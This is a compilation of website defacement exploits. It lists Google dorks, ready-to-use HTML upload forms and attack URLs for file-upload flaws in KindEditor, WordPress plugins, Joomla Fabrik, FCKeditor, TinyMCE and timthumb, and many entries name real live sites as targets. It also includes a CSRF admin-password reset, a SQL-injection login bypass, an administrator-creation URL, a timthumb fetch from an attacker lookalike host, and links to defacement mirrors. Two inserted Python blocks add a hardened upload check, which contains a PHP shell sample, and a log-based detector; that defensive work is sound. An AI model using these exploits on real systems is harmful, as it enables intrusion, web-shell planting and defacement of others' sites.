HY hack: Defacement with the Remote File Upload Exploit Vulnerability technique. This bug in KindEditor lets you upload remote files (.txt, .html, etc.) through its JSON upload handlers for several server-side languages (PHP / ASP / JSP / ASP.NET). The bug was found in old versions by another author, but it still works in the latest version, 4.1.5, released on Jan 19, 2013.
- wordpress
- dork: /wp-admin/install.php
- example:
- dork: inurl:/wp-content/themes/project10-themes/
- exploit script:
- <form enctype='multipart/form-data' action='http://ogrencikariyeri.com/haber/wp-content/themes/project10-theme/functions/upload-handler.php' method='post'>Please Choose a File: <input name='orange_themes' type='file' /><br/><input type='submit' value='Upload' /></form>
- path: http://127.0.0.1/wordpress/wp-content/uploads/year/month/up.php
- requires request tampering (e.g. with Tamper Data)
- Exploit Title: Baruque Casa Remote File Upload Vulnerability
- # Google Dork: intext:Copyright Baruque Casa.
- # Exploit Author: Mr.T959
- # Author Website: http://mr-t959.xyz
- # Tested on: Windows 7
- # Exploit HTML Code:
- <form method='post' target='_blank' action='http://www.baruquecasa.com.br/admin/server/php/' enctype='multipart/form-data'> <input type='file' name='files[]'><input type='submit' name='g' value='Upload!'></form>
- # Exploit: admin/server/php/
- # Successful: {"files":[{"name":"b6fa0f07f57514815d1b310a6b97d70e.jpeg","size":5362,"type":"image/jpeg","url":"http://www.baruquecasa.com.br/admin/server/php/fotos/b6fa0f07f57514815d1b310a6b97d70e.jpeg"}]}
- # Error: {"files":[{"name":"geo.php","size":3468,"type":"application/octet-stream","error":"Filetype not allowed"}]}
- # Demo: http://www.baruquecasa.com.br/admin/server/php/
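The two responses above show the whole problem: the handler rejects geo.php by file type but stores whatever else it gets under the client's own filename, so renaming the shell (.phtml, shell.php.jpg, tampering the request after the client-side check) gets it through. The following is an added example, not code from Mr.T959 or from the blueimp/jQuery File Upload project; the denylist model and the image allow-list are assumptions made for the demo, since the real accept pattern of these deployments is not visible on the page. It puts the weak check next to a hardened one (single allow-listed extension, magic-byte check, server-chosen storage name, client filename and Content-Type ignored).

```python
import os
import secrets

# Constructed sample bodies for the demo (not files from any real target).
PHP_SHELL = b"<?php system($_GET['c']); ?>"
JPEG_BYTES = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32

# --- the weak check --------------------------------------------------------
# Assumption: models the behaviour implied by the responses above (geo.php refused
# with "Filetype not allowed", everything else stored under the client's own name).
# The real accept_file_types pattern of those deployments is not known.
DENIED_SUFFIXES = (".php",)


def denylist_accepts(filename: str) -> bool:
    """Refuses only a trailing '.php'; shell.phtml, shell.php.jpg and shell.php. all pass."""
    return not filename.lower().endswith(DENIED_SUFFIXES)


# --- the hardened check ----------------------------------------------------
# Allow-list of extensions with the magic bytes the body must start with.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024


def hardened_check(filename: str, body: bytes) -> tuple[bool, str]:
    """Return (False, reason) or (True, server-chosen storage name).

    The client-supplied Content-Type is deliberately not a parameter: it is attacker-controlled.
    """
    # Directory components are never trusted; Windows separators are normalised first.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base != base.strip() or any(ord(c) < 32 for c in base):
        return False, "bad filename"  # also catches the NUL-byte trick shell.php\x00.jpg
    parts = base.lower().split(".")
    # Exactly one extension: blocks shell.php.jpg, shell.php. (trailing dot) and dotfiles like .htaccess
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"
    ext = parts[1]
    if ext not in IMAGE_MAGIC:
        return False, f"extension .{ext} not allowed"
    if len(body) > MAX_BYTES:
        return False, "too large"
    if not body.startswith(IMAGE_MAGIC[ext]):
        return False, "content does not match extension"
    # The server picks the stored name: no client filename ever reaches the filesystem.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name, body in [("geo.php", PHP_SHELL), ("shell.phtml", PHP_SHELL),
                       ("shell.php.jpg", JPEG_BYTES), ("fake.jpg", PHP_SHELL),
                       ("photo.JPG", JPEG_BYTES)]:
        print(f"{name:15} denylist={denylist_accepts(name)!s:5} hardened={hardened_check(name, body)}")
```

The magic-byte check alone is not enough: a polyglot (a valid JPEG header with PHP appended) still passes it. That is why the stored extension is taken from the allow-list rather than the request, and why the upload directory must not execute scripts at all (no PHP handler for that directory, or storage outside the web root served through a download script).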
- #Exploit Author: HACKER WAHAB
- #Author Website: HTTP://WWW.HACKERWAHAB.COM/
- #Exploit Title: Exploit Wordpress Arbitrary File Upload Vulnerability in Vertical SlideShow
- #Google Dork : inurl:/wp-content/plugins/wp-vertical-gallery/
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Exploit!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- <html>
- <body>
- <form action='http://www.sparkdesign.com/wp-admin/admin.php?page=vertical_manage' method='POST' enctype='multipart/form-data'>
- <input type='hidden' name='task' value='vrt_add_new_album' />
- <input type='hidden' name='album_name' value='Arbitrary File Upload' />
- <input type='hidden' name='album_desc' value='Arbitrary File Upload' />
- <input type='submit' value='Submit' />
- </form>
- </body>
- </html>
- jquery xploit
- By Clash Hackers:
- Dork : /assets/global/plugins/jquery-file-upload/
- Exploit : http://localhost/assets/global/plugins/jquery-file-upload/server/php/
- Script CSRF :
- <form method='POST' action='http://localhost/assets/global/plugins/jquery-file-upload/server/php/' enctype='multipart/form-data'>
- <input type='file' name='files[]' /><button>Upload</button>
- </form>
- xploiter: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
- xploit uploader:
- <!DOCTYPE html>
- <html><body><form name='f' method='post' enctype='multipart/form-data' action='https://copypaste.ph/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload'><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td>New image:</td><td><input name='file' type='file' size='30'></td><td align='right'><input type='submit' name='submit' value='Transfer'></td></tr></table></form></body></html>
- CSRF XPLOIT
- <form name='myform' method='post' action='http://localhost/zeuscart-master/admin/?do=adminprofile&action=update'>
- <input type='hidden' name='admin_name' value='admin2'>
- <input type='hidden' name='admin_email' value='[email protected]'>
- <input type='hidden' name='admin_password' value='admin'>
- </form>
- <script>document.myform.submit();</script>
- Exploit Title: CSRF Vulnerability (Tinymce plugins imgsurfer)
- Version: 4.1.2
- Date: 1-01-2018
- Tested on: Linux
- Google Dork: inurl:/tinymce/plugins/imgsurfer/
- Video PoC: https://www.youtube.com/watch?v=pL-0-fmDVCE&t=213s
- Category: webapps
- Exploit Author: Legion BOmb3r
- Contact: [email protected]
- Greetz to my team ErrOr SquaD
- https://www.tinymce.com/
- Description: The vulnerability allows an attacker to upload a shell ...
- Proof of Concept: http://www.site.com/tinymce/plugins/imgsurfer/main.php
- CSRF code:
- <html><body><form name='f' method='post' enctype='multipart/form-data' action='http://www.site.com/tinymce/plugins/imgsurfer/main.php'><table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td>New image:</td><td><input name='file' type='file' size='30'></td><td align='right'><input type='submit' name='submit' value='Transfer'></td></tr></table></form></body></html>
- Google dork: inurl:/wp-content/plugins/viral-optins/
- Exploit: https://127.0.0.1/wp/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
- <form method='POST' action='https://127.0.0.1/wp/wp-content/plugins/viral-optins/api/uploader/file-uploader.php' enctype='multipart/form-data'>
- <input type='submit' name='Submit' value='Upload'>
- </form>
- Dork : /index.php/index/user/register
- -----------------------------------
- Shell path: /files/journals/1/articles/(ID)/submission/original/(random shell name .phtml)
- inurl:admin/fckeditor site:pl
- http://alexan.com.ph/mailinglist_new/admin/FCKeditor/editor/filemanager/browser/default/browser.html?
- append to browser.html: connector=connectors/asp/connector.php
- xploit: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
- dork: inurl:'/sitefinity/login.aspx'
- /assets/js/plugins/ckeditor/plugins/imageuploader/imgbrowser.php
- wp xploit
- 1. Just append this to the end of the site URL:
- dork: inurl: wp-content/upload/job-manager-uploads/
- sample:https://unhrd.org/post-a-job/
- +++++++++++++++++++++++++++++++
- path: /sites/default/files/webform/(your html file).html
- Inurl: /wp-content/plugins/woocommerce-product-options/includes/image-upload.php
- ++++++++++++++++++++++++++++++++
- ●inurl:/wp-content/themes/purevision/sliders/
- Exploit : /wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php
- Dork :
- - inurl:/administrator/ intitle:login
- test: http://www.lenovoshowroomtelangana.in/administrator/
- bypass admin
- Username : '='or' or '=' 'or'
- Dork = inurl:wp-content/themes/qaengine
- Exploit = /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=username&user_pass=password&role=administrator
- admin/FCKeditor/ xploit working
- xploiter: site.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
- dork: inurl:advert_detail.php?id=
- Joomla xploit working
- dork: inurl:viewtable?cid= site:it
- append the link below to the URL
- /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
- elfinder/files xploit
- dork: inurl: 'elfinder/files'
- xploiter: http://www.simplifieddigitalmarketing.com/asu.php
- Timthumb exploit working
- vulnerable version: 1.30
- dork: inurl:/timthumb.php?src=
- 1. Find the timthumb.php source
- ?src=http://flickr.com.phuoclongcomputer.com/up.php
- ++++++++++++++++++++++++++++++++++
- Save the file as .html :) Exploit Title: Arbitrary File Upload Vulnerability in Estatik
- Exploit:
- <html> <body> <form action='http://www.TARGET.com/wp-admin/admin-ajax.php' method='POST' enctype='multipart/form-data'> <input type='hidden' name='action' value='es_prop_media_images' /> <input type='file' name='es_media_images[]' /> <input type='submit' value='Submit' /> </form> </body> </html>
- ++++++++++++++++++++++++++++++++++
- # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
- shell path:/wp-content/uploads/dreamwork/7_uploadfolder/big/shellname.php
- exploit
- <html>
- <body>
- <form action='http://www.site.com/wp-admin/admin.php?page=dreamwork_manage' method='POST' enctype='multipart/form-data'>
- <input type='hidden' name='task' value='drm_add_new_album' />
- <input type='hidden' name='album_name' value='Arbitrary File Upload' />
- <input type='hidden' name='album_desc' value='Arbitrary File Upload' />
- <input type='submit' value='Submit' />
- </form>
- </body>
- </html>
- dork: inurl: /wp-content/plugins/Tevolution/tmplconnector/monitize/templatic-custom_fields/Demo
- <form method='post' action='http://site.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php' enctype='multipart/form-data'>
- <input type='file' name='Filedata'><br>
- <input type='submit' name='submit' value='Upload'>
- </form>
- Joomla Arbitrary File Upload Vulnerability
- # 1:Search Google Dork and Choose a Target
- # 2: exploit:
- /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
- # 4: PoC: http://www.localhost.com/media/index.... or http://www.localhost.com/media/shell.php
- http://www.aquoschemical.it/sito/medi...
- https://web.facebook.com/FOXILITRIX.0
- http://www.ghostshockey.it/media/r3dfl4g.html
- http://www.nordnetimmobiliare.it/media/r3dfl4g.html
- https://mirror-h.org/zone/1504323/
- ~R3DFL4G~
- ++++++++++++++++++++++++++++++++++
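Every recipe on this page leaves the same trace in a web server access log: a request to a known upload handler, an admin-ajax.php call that creates an administrator, a Fabrik import or ajax_upload URL, or a timthumb.php src pointing at a lookalike host. The following is an added example for the defensive side, not part of the original compilation or of any of the named authors' code: it classifies combined-format log lines against the endpoints listed above. The log lines are constructed for the demo, and the trusted timthumb host list is an assumption that should come from the deployment's own ALLOWED_SITES.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined/common log format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Upload handlers named on this page. A POST from an unauthenticated client is the attack;
# a GET is usually reconnaissance (the dork hit being checked by hand).
UPLOAD_HANDLERS = [
    ("jquery-file-upload server/php", re.compile(r"/jquery-file-upload/server/php/?$", re.I)),
    ("blueimp admin/server/php", re.compile(r"/admin/server/php/?$", re.I)),
    ("FCKeditor filemanager", re.compile(r"/fckeditor/editor/filemanager/", re.I)),
    ("uploadify", re.compile(r"/uploadify/uploadify\.php$", re.I)),
    ("tinymce imgsurfer", re.compile(r"/tinymce/plugins/imgsurfer/main\.php$", re.I)),
    ("ckeditor imageuploader", re.compile(r"/ckeditor/plugins/imageuploader/", re.I)),
    ("project10 upload-handler", re.compile(r"/functions/upload-handler\.php$", re.I)),
    ("viral-optins file-uploader", re.compile(r"/viral-optins/api/uploader/file-uploader\.php$", re.I)),
    ("Tevolution single-upload", re.compile(r"/templatic-custom_fields/single-upload\.php$", re.I)),
    ("woocommerce-product-options image-upload",
     re.compile(r"/woocommerce-product-options/includes/image-upload\.php$", re.I)),
]

# Assumption for the demo: hosts timthumb may legitimately fetch from. Compared as exact
# hostnames, so the flickr.com.<attacker> lookalike used above is not trusted.
TRUSTED_TIMTHUMB_HOSTS = {"flickr.com", "www.flickr.com"}


def classify(line):
    """Return a dict describing a suspicious request, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, target = m["method"], m["target"]
    url = urlsplit(target)
    path, qs = url.path, parse_qs(url.query)
    hit = {"ip": m["ip"], "method": method, "target": target}

    for name, rx in UPLOAD_HANDLERS:
        if rx.search(path):
            kind = "arbitrary-upload-attempt" if method in ("POST", "PUT") else "upload-endpoint-probe"
            return {**hit, "kind": kind, "detail": name}

    # qaengine: user creation through admin-ajax.php with role=administrator
    if path.endswith("/wp-admin/admin-ajax.php") and qs.get("action") == ["ae-sync-user"]:
        kind = "privesc-ae-sync-user" if "administrator" in qs.get("role", []) else "suspicious-ae-sync-user"
        return {**hit, "kind": kind, "detail": qs.get("user_login", ["?"])[0]}

    # Fabrik: both the CSV import view and the fileupload plugin's ajax_upload accept files
    if qs.get("option") == ["com_fabrik"] and (qs.get("c") == ["import"] or qs.get("plugin") == ["fileupload"]):
        return {**hit, "kind": "joomla-fabrik-upload", "detail": url.query}

    # timthumb: remote src whose host is not exactly a trusted one
    if path.endswith("/timthumb.php") and qs.get("src"):
        src = qs["src"][0]
        host = (urlsplit(src).hostname or "").lower()
        if src.lower().startswith(("http://", "https://")) and host not in TRUSTED_TIMTHUMB_HOSTS:
            return {**hit, "kind": "timthumb-remote-src", "detail": host}
    return None


def scan(lines):
    return [a for a in (classify(l) for l in lines) if a]


# Constructed sample log lines (not real traffic): the page's paths plus two benign requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "POST /assets/global/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2023:14:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=username&user_pass=password&role=administrator HTTP/1.1" 200 77 "-" "curl/7.88"',
    '198.51.100.9 - - [10/Oct/2023:14:05:40 +0000] "GET /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0 HTTP/1.1" 200 9012 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2023:14:07:02 +0000] "GET /timthumb.php?src=http://flickr.com.phuoclongcomputer.com/up.php HTTP/1.1" 200 400 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2023:14:07:30 +0000] "GET /wp-content/uploads/2019/05/photo.jpg HTTP/1.1" 200 34120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2023:14:08:00 +0000] "GET /timthumb.php?src=http://flickr.com/photos/1.jpg&w=100 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a["kind"], a["ip"], a["method"], a["target"], a["detail"])
```

Path matching is deliberately case-insensitive and anchored on the handler filename rather than the full plugin path, because the same handler ships under many theme and plugin directories (the jQuery File Upload server/php/ script appears twice above under different prefixes). A 200 on an upload-attempt line is the signal to go and look at what landed in the uploads directory.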